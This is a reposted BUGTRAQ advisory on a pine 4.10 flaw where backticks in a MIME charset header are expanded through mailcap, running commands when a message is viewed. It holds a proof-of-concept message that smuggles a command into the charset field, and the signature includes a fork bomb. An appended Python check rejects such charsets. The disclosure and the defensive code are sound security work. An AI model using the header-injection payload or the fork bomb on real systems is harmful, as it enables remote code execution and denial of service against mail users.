Michal Zalewski posts to BUGTRAQ:

Affected systems:
-----------------

Any Un*x system running 'pine' up to version 4.10 (latest).

Compromise:
-----------

Remote execution of arbitrary code when the message is viewed.

Details:
--------

About five months ago, I reported a vulnerability in the metamail package used with pine. I also noticed that the '`' character is incorrectly expanded by pine. The problem has been ignored (probably no one understood what I was talking about? ;-). But no matter.

An excerpt from /etc/mailcap:

text/plain; shownonascii iso-8859-1 %s; test=test "`echo %{charset} | tr '[A-Z]' '[a-z]'`" = iso-8859-1; copiousoutput

Impact:
-------

And now, ladies and gentlemen - my old bug, reinvented. Usually, the above mailcap line is expanded to:

[...] execve </bin/sh> (sh) (-c) (test "`echo 'US-ASCII' | tr '[A-Z]' '[a-z]'`" = iso-8859-1)

Hmm, but take a look at this message:

************************** MIME MESSAGE FOLLOWS **************************
From: Attacker <attacker@eleet.net>
To: Victim <victim@somewhere.net>
Subject: Happy birthday ...
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="8323328-235065145-918425607=:319"

--8323328-235065145-918425607=:319
Content-Type: TEXT/PLAIN; charset='US-ASCII'

Make a wish...

--8323328-235065145-918425607=:319
Content-Type: TEXT/PLAIN; charset=``touch${IFS}ME``; name="logexec.c"
Content-Transfer-Encoding: BASE64
Content-Description: wish
Content-Disposition: attachment; filename="wish.c"

...it could be your last.
*************************** MIME MESSAGE ENDS ***************************

The result is:

[...] execve </bin/sh> (sh) (-c) (test "`echo '``touch${IFS}ME``' | tr '[A-Z]' '[a-z]'`" = iso-8859-1)

...and arbitrary code ('touch ME', encoded using the ${IFS} trick) is executed when the message is viewed.

Fix:
----

Well, it's the second time I have reported problems with ` in headers.
Maybe the pine developers should wait a little longer ;-)

___________________________________________________________________
Michal Zalewski [lcamtuf@ids.pl] [ENSI / marchew]
[dione.ids.pl SYSADM] [lunete.nfi.pl SYSADM] [http://dione.ids.pl/lcamtuf]
bash$ :(){ :|:&};:
[voice phone: +48 (0) 22 813 25 86] [pager (MetroBip): 0 642 222 813]
To iterate is human, to recurse divine [P. Deutsch]
Remote exploit for pine available
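A defender-side check for the expansion the post describes, added here as an example that is not part of Zalewski's post or of pine itself: it shows why wrapping the charset in single quotes does not help once the value lands inside the mailcap command's own backticks, and rejects any charset that is not a plain token before a command line is ever built. The sample message, its `.invalid` address and boundary, and the token policy are assumptions.

```python
import re
from email import message_from_string

# Constructed sample modelled on the post's message (placeholder address and
# boundary; the base64 attachment body is omitted).
SAMPLE_MESSAGE = """\
From: Attacker <attacker@example.invalid>
Content-Type: MULTIPART/MIXED; BOUNDARY="bnd1"

--bnd1
Content-Type: TEXT/PLAIN; charset='US-ASCII'

Make a wish...
--bnd1
Content-Type: TEXT/PLAIN; charset=``touch${IFS}ME``; name="logexec.c"

...it could be your last.
--bnd1--
"""
# The test= command from the /etc/mailcap line quoted in the post.
MAILCAP_TEST = "test \"`echo %{charset} | tr '[A-Z]' '[a-z]'`\" = iso-8859-1"
# Assumed policy: a charset is a short plain token (IANA names are at most
# 40 printable ASCII chars), which leaves no room for shell metacharacters.
CHARSET_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._:+-]{0,39}$")


def expand_mailcap(template, params):
    """%{name} substitution as the post shows pine doing it: the value is
    wrapped in single quotes, but a backtick inside it still terminates the
    template's own backtick, so quoting alone cannot make this safe."""
    return re.sub(r"%\{(\w+)\}",
                  lambda m: "'" + params.get(m.group(1), "") + "'", template)

def safe_charset(value):
    return bool(CHARSET_RE.match(value))

def expand_mailcap_checked(template, params):
    """Refuse to build the command at all when the charset fails the policy."""
    if not safe_charset(params.get("charset", "")):
        raise ValueError("charset is not a plain token; refusing to expand")
    return expand_mailcap(template, params)

def audit_message(raw):
    """(part index, charset, ok) for every MIME part that carries a charset."""
    out = []
    for i, part in enumerate(message_from_string(raw).walk()):
        cs = part.get_param("charset")
        if cs is not None:
            cs = cs.strip("'\"")  # pine drops the sender's quotes; so do we
            out.append((i, cs, safe_charset(cs)))
    return out
```

Running `audit_message(SAMPLE_MESSAGE)` flags the second part, and `expand_mailcap_checked` raises for it instead of producing the command line the post shows.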